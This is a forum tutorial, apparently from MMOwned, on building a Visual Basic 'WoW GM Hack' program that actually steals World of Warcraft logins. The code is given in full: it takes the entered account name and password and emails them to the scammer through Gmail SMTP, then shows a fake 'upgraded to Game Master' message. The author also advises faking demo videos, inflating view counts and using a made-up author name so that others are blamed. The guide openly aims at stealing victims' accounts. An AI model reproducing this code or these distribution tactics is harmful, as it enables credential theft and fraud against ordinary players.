Hey there! Welcome to my guide on making a scamming program in Visual Basic 2008!
Start by opening up a new Windows Application Project shown in the picture below:
1: Click 'Windows Forms Application'.
2: Give your project a proper name.
Then click OK.
You'll now have your newly created form. First give your form a title. You can also change the background colour of the form, the border type, etc. Use the picture below for help.
1: Click the form
Top *: The border type of the form. I suggest FixedToolWindow. It looks the coolest.
Bottom *: The form's title.
Now that you have your form looking good, you can add some controls. For this guide I am going to be using a simple Account Name/Password scam. If you know what you're doing you can make an email field as well. Okay, now you can add 2 labels, 2 textboxes and a button from the toolbox on the left of the screen. Maneuver your boxes, labels and button to your likings, and your form should now look somewhat like this:
Now you can change the caption of the label and button by changing the 'Text' field in the properties like so:
It's also handy to change the Password Textbox's PasswordChar to * like so:
This is now what your application should look like: (I have also added some text to demonstrate PasswordChar)
Now we're going to add the code. On the top bar click View -> Code and it will come up with a blank textbox:
Insert the following code and adjust it accordingly to the settings below the following code:
Code:
Imports System.Web
Imports System.IO
Imports System.Net.Mail
Public Class Form1
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If TextBox1.Text = "" Then
MsgBox("The account field is not filled in!", MsgBoxStyle.OkOnly, "WoW GM Hack")
End If
If TextBox2.Text = "" Then
MsgBox("The password field is not filled in!", MsgBoxStyle.OkOnly, "WoW GM Hack")
End If
Dim mail As New System.Net.Mail.MailMessage()
Dim SmtpServer As New SmtpClient
SmtpServer.Credentials = New Net.NetworkCredential("Blank", "Blank")
SmtpServer.Port = 587
SmtpServer.Host = "smtp.gmail.com"
SmtpServer.EnableSsl = True
mail.To.Add("Blank")
mail.From = New MailAddress("Blank")
mail.Subject = "Blank"
mail.Body = "Blank"
SmtpServer.Send(mail)
End Sub
End Class
Change this to a Gmail Username (Be sure to include @gmail.com!). Please note that this is inside the quotation marks.
Change this to the Password of that Gmail account! Please note that this is inside the quotation marks.
Change this to the email the account information it will be sent to. This does not have to be Gmail! (Be sure to include the @whatever.com once again!) Please note that this is inside the quotation marks.
This will be the same as Red! Please note that this is inside the quotation marks.
Change this to the subject of the email that will be received upon clicking the button that says (in this case) 'Activate GM Powers'. Please note that this is inside the quotation marks.
Change this to the body of the email. Read below to find out how to include the account name and password in the email. Please note that this is NOT inside the quotation marks.
Now to attaching the account name and password to the email. Start by adding this to the body:
Code:
"Account: " & TextBox1.Text
Explanation: In the body of the email it will now say this:
Account: <the text the victim wrote in TextBox1>
But of course, we will need it to also say the password. We can do this by using the same mechanics as the previous code. After doing that, the code will be:
Code:
"Account: " & TextBox1.Text & vbNewLine & "Password: " & TextBox2.Text
Explanation: In the body of the email it will now say this:
Account: <the text the victim wrote in TextBox1>
Password: <the text the victim wrote in TextBox2>
The code is very self explanatory but still works as well. This is the conclusion of the body, but not the end of the tutorial! 
Next we will add a success (or error, whichever works better for you) message after the user clicks the 'Activate GM Powers' button. This is very easily done and is explained below.
This code should be added on the next line down after SmtpServer.Send(mail). Once again please adjust it accordingly to the settings below the following code:
Code:
MsgBox("Blank", Blank, "Blank")
This is the message that pops up after you click the 'Activate GM Powers' button. Please note that this is inside the quotation marks.
This is the style of the message. Personally I would use MsgBoxStyle.OkOnly as it is the most noob friendly (I don't mean you, I mean the victim :P).
This is the title of the message. I would probably name it the same as the title of the form (in this case WoW GM Hack).
So now we have our message. I opted to go for the success message. This is what mine looked like:
Code:
MsgBox("Done! Your account's flag has been upgraded to Game Master. It will be fully updated within 24 hours.", MsgBoxStyle.OkOnly, "WoW GM Hack")
Now to make the program look a bit more professional. On the top bar click Project -> <Project Name> Properties (It's right down the bottom). It will come up with this screen:
Click the circled button
Then you will get another settings form. Fill it out according to the caption below the following picture:
Red labeled box: Type in a random made up name. This is so that people blame this made up person that doesn't exist when they get hacked... Well, this is what I do with my scamming programs anyway.
Blue labeled boxes: Make these blank if they are not already.
The rest of them you can just leave how they are.
Nearly there! Now click the Compile tab (shown in picture below):
Red box: The Compile tab
Blue box: Click this and browse for your Desktop.
Now that this is done, on the top bar, click Build -> Build <Project Name>.
Go to your desktop and find the .exe file. You can delete the other files that are built including the .pdb and .xml files. That .exe file is your finished program! Congratulations! 
With that, you can upload it to Rapidshare, Megaupload etc. and put a video on YouTube showing off the hack. Obviously it doesn't actually work, so record yourself on a Private server using Game Master Commands.
And please, don't steal other peoples videos! They work hard on them, and I know what it feels like to be copied.
Download TubeIncreaser, and run that on your video. That will increase the hits and increase the popularity of it, getting you more accounts.
That just about sums up my Guide on how to make an Account Scamming program. I hope you learned something, and I wish you the very best of luck scamming peoples accounts.
Attention!
This guide was written by JetlagJad of MMOwned and is only allowed to be shown on this site (MMOwned). If you see any other sites with the same guide please private message me on the forums.